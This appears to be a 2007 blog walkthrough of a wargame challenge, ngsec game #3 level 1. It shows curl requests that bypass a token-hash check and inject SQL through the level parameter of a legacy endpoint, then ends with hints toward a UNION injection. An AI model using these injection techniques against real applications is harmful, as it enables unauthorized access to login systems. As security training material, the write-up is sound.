ngsec game #3 level 1

Finally got it. wohoo.

This a blind sql injection with a twist. Thanks to everybody at the dc303 meeting Friday. I learned a lot.

Upon first inspection, game 1 doesn't seem to be susceptible to any sort of issue.

Some odd things are being set:
name="token" value="34bu5Un3zJ3S4AxXV52pmRMW7U5PUnv2"
name="token2" value="c4ca4 238a0b923820dcc509a6f75849b"
name="level" value="1"
Finally we figured out the second value was an md5sum of the 'level' value, 1. Some more messing around and we figured out that we would get a "Query String Tampered!", must be some sort of weak field verification.

After being stuck, and prone to cheeting ;) ... I finally broke down and looked in the forums. Thats where someone pointed out the call to game3/level1/ajax_auth_ver3.php. Version 3 huh? Wonder if there is a version 1.

(note some of the url has been remove for formating)

$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&=c4ca4238a0b923820dcc509a6f75849b\&level=1
Error: invalid credentials.

Looks like it, wonder if this one has issues.

echo -n "1 ' or 1=1" | md5sum
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&token2=8cf277be3b542e7abd5458bc2ba3a7a7\&level=1\'+or+1=1--
Query String Tampered!

Hrm... what is going on. Messing around some more, the entry must be getting stripped. This can also be verified looking at the file ajax.js. In particular this line:

qstr = 'login=' + escape(login) + '&password='+ (password) + '&token='+ escape(token) + '&token2='+ escape(token2) + '&level='+ escape(level);

Weak sauce. Some more playing around, and we finally find out this script is indeed injectable.
$ echo -n a | md5sum
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&token2=0cc175b9c0f1b6a831c399e269772661\&level=a
Error: SQL error.

Thats good.

$ echo -n "1 or 1=1" | md5sum
$ curl http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=hax0r\&password=reet123\&token=EhCsWGA7h67qSExYP2lDvaKZ2SlPx7j5\&token2=77a63a557cb73fffdf2247ac79e6b8f2\&level=1+or+1=1
Error: invalid credentials.

So we are able to inject sql.
Having blown past my knowledge of sql injection a while ago, I read the forum over and over and over, as well as just about every sql injection google hit.
I don't want to give the rest away, so here are some hints.

  • The answer is a UNION injection in the level field.
  • The md5sum of label must match token2.
  • You need something in the login and password fields.
  • You want the injection to return 1 result.
Have fun!

*2007-02-21 - fix typo.

1 comment:

Nicholas said...

typo: level not label